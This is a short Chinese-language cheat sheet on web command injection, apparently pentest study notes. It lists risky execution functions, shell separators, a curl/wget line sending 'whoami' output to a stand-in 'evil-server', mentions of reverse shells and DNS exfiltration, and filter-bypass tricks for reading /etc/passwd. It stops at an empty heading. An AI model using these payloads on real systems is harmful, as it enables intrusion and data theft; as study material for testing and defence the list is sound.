【命令注入】
通常指因为Web应用在服务器上拼接系统命令而造成的漏洞。 该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名IP掩码网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。
system
exec
passthru
shell_exec
popen
proc_open
Python
java.lang.Runtime.getRuntime().exec(command)
常见注入方式
分号分割
|| && & 分割
| 管道符
\r\n %d0%a0 换行
反引号解析
$() 替换
无回线技巧
bash反弹shell
DNS外带数据
http外带
curl evil-server/$(whoami) wget evil-server/$(whoami)
无带外时利用 sleep 或其他逻辑构造布尔条件
常见绕过方式编辑
空格绕过
< 符号 cat<123
\t / %09
${IFS} 其中{}用来截断,比如cat$IFS2会被认为IFS2是变量名。另外,在后面加个$可以起到截断的作用,一般用$9,因为$9是当前系统shell进程的第九个参数的持有者,它始终为空字符串
黑名单绕过
a=l;b=s;$a$b
base64 echo "bHM=" | base64 -d
/?in/?s => /bin/ls
连接符 cat /etc/pass'w'd
未定义的初始化变量 cat$x /etc/passwd
长度限制绕过